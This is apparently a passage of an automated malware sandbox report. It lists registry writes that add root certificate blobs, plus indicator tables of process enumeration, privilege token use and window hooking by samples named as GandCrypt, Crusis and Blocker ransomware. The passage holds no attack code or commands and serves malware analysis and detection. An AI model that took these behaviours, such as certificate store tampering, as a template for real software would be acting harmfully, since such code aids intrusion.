979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd	y_installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8	y_installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 0f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c0b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000006200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df8653000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c01400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b1d00000001000000100000005467b0adde8d858e30ee517b1a19ecd909000000010000000c000000300a06082b060105050703030300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b8200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82	y_installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 1900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b40300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b809000000010000000c000000300a06082b060105050703031d00000001000000100000005467b0adde8d858e30ee517b1a19ecd91400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b53000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c06200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df860b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000000f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82	y_installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0400000001000000100000001bfe69d191b71933a372a80fe155e5b50300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0b00000001000000100000005300650063007400690067006f0000001d0000000100000010000000885010358d29a38f059b028559c95f901400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd253000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483190000000100000010000000ea6089055218053dd01e37e1d806eedf2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd	y_installer.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Desktop\00371\NOPQRSTUVWXYZ{\|}~€‚Ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™Š›ŒŽŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍC:\Users\Admin\Desktop\	Trojan-Ransom.Win32.Blocker.gpjb-9aaa3d6cd47171f08169c6f96f721ae1820b655393f3410aa31891c133e0d015.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3748	taskmgr.exe
3748	taskmgr.exe
3748	taskmgr.exe
3748	taskmgr.exe
3748	taskmgr.exe
3748	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
2108	powershell.exe
2108	powershell.exe
2108	powershell.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
2192	7zFM.exe
1292	taskmgr.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
9244	Trojan-Ransom.Win32.Blocker.gpjb-9aaa3d6cd47171f08169c6f96f721ae1820b655393f3410aa31891c133e0d015.exe
9244	Trojan-Ransom.Win32.Blocker.gpjb-9aaa3d6cd47171f08169c6f96f721ae1820b655393f3410aa31891c133e0d015.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
11336	browser.exe
11336	browser.exe
11336	browser.exe
11336	browser.exe

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
5844	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	2192	7zFM.exe
Token: 35	2192	7zFM.exe
Token: SeSecurityPrivilege	2192	7zFM.exe
Token: SeDebugPrivilege	3748	taskmgr.exe
Token: SeSystemProfilePrivilege	3748	taskmgr.exe
Token: SeCreateGlobalPrivilege	3748	taskmgr.exe
Token: SeDebugPrivilege	1292	taskmgr.exe
Token: SeSystemProfilePrivilege	1292	taskmgr.exe
Token: SeCreateGlobalPrivilege	1292	taskmgr.exe
Token: 33	3748	taskmgr.exe
Token: SeIncBasePriorityPrivilege	3748	taskmgr.exe
Token: SeDebugPrivilege	2108	powershell.exe
Token: SeDebugPrivilege	2724	wsmprovhost.exe
Token: SeIncreaseQuotaPrivilege	3640	WMIC.exe
Token: SeSecurityPrivilege	3640	WMIC.exe
Token: SeTakeOwnershipPrivilege	3640	WMIC.exe
Token: SeLoadDriverPrivilege	3640	WMIC.exe
Token: SeSystemProfilePrivilege	3640	WMIC.exe
Token: SeSystemtimePrivilege	3640	WMIC.exe
Token: SeProfSingleProcessPrivilege	3640	WMIC.exe
Token: SeIncBasePriorityPrivilege	3640	WMIC.exe
Token: SeCreatePagefilePrivilege	3640	WMIC.exe
Token: SeBackupPrivilege	3640	WMIC.exe
Token: SeRestorePrivilege	3640	WMIC.exe
Token: SeShutdownPrivilege	3640	WMIC.exe
Token: SeDebugPrivilege	3640	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3640	WMIC.exe
Token: SeRemoteShutdownPrivilege	3640	WMIC.exe
Token: SeUndockPrivilege	3640	WMIC.exe
Token: SeManageVolumePrivilege	3640	WMIC.exe
Token: 33	3640	WMIC.exe
Token: 34	3640	WMIC.exe
Token: 35	3640	WMIC.exe
Token: 36	3640	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3640	WMIC.exe
Token: SeSecurityPrivilege	3640	WMIC.exe
Token: SeTakeOwnershipPrivilege	3640	WMIC.exe
Token: SeLoadDriverPrivilege	3640	WMIC.exe
Token: SeSystemProfilePrivilege	3640	WMIC.exe
Token: SeSystemtimePrivilege	3640	WMIC.exe
Token: SeProfSingleProcessPrivilege	3640	WMIC.exe
Token: SeIncBasePriorityPrivilege	3640	WMIC.exe
Token: SeCreatePagefilePrivilege	3640	WMIC.exe
Token: SeBackupPrivilege	3640	WMIC.exe
Token: SeRestorePrivilege	3640	WMIC.exe
Token: SeShutdownPrivilege	3640	WMIC.exe
Token: SeDebugPrivilege	3640	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3640	WMIC.exe
Token: SeRemoteShutdownPrivilege	3640	WMIC.exe
Token: SeUndockPrivilege	3640	WMIC.exe
Token: SeManageVolumePrivilege	3640	WMIC.exe
Token: 33	3640	WMIC.exe
Token: 34	3640	WMIC.exe
Token: 35	3640	WMIC.exe
Token: 36	3640	WMIC.exe
Token: SeBackupPrivilege	1916	vssvc.exe
Token: SeRestorePrivilege	1916	vssvc.exe
Token: SeAuditPrivilege	1916	vssvc.exe
Token: SeShutdownPrivilege	3392	YandexPackSetup.exe
Token: SeIncreaseQuotaPrivilege	3392	YandexPackSetup.exe
Token: SeSecurityPrivilege	1184	msiexec.exe
Token: SeCreateTokenPrivilege	3392	YandexPackSetup.exe
Token: SeAssignPrimaryTokenPrivilege	3392	YandexPackSetup.exe
Token: SeLockMemoryPrivilege	3392	YandexPackSetup.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2192	7zFM.exe
2192	7zFM.exe
3748	taskmgr.exe
3748	taskmgr.exe
3748	taskmgr.exe
3748	taskmgr.exe
3748	taskmgr.exe
3748	taskmgr.exe
3748	taskmgr.exe
3748	taskmgr.exe
3748	taskmgr.exe
3748	taskmgr.exe
3748	taskmgr.exe
3748	taskmgr.exe
3748	taskmgr.exe
3748	taskmgr.exe
3748	taskmgr.exe
3748	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
3748	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
3748	taskmgr.exe
1292	taskmgr.exe
3748	taskmgr.exe
1292	taskmgr.exe
3748	taskmgr.exe
1292	taskmgr.exe
3748	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
3748	taskmgr.exe
3748	taskmgr.exe
3748	taskmgr.exe
3748	taskmgr.exe
3748	taskmgr.exe
3748	taskmgr.exe
3748	taskmgr.exe
3748	taskmgr.exe
3748	taskmgr.exe
3748	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
3748	taskmgr.exe
3748	taskmgr.exe
3748	taskmgr.exe
3748	taskmgr.exe
3748	taskmgr.exe
3748	taskmgr.exe
3748	taskmgr.exe
3748	taskmgr.exe
3748	taskmgr.exe
3748	taskmgr.exe
3748	taskmgr.exe
3748	taskmgr.exe
3748	taskmgr.exe
3748	taskmgr.exe
3748	taskmgr.exe
3748	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
3748	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
3748	taskmgr.exe
1292	taskmgr.exe
3748	taskmgr.exe
1292	taskmgr.exe
3748	taskmgr.exe
1292	taskmgr.exe
3748	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
3748	taskmgr.exe
3748	taskmgr.exe
3748	taskmgr.exe
3748	taskmgr.exe
3748	taskmgr.exe
3748	taskmgr.exe
3748	taskmgr.exe
3748	taskmgr.exe
3748	taskmgr.exe
3748	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe
1292	taskmgr.exe

Suspicious use of SetWindowsHookAW 64 IoCs

pid	Process
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
5932	Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
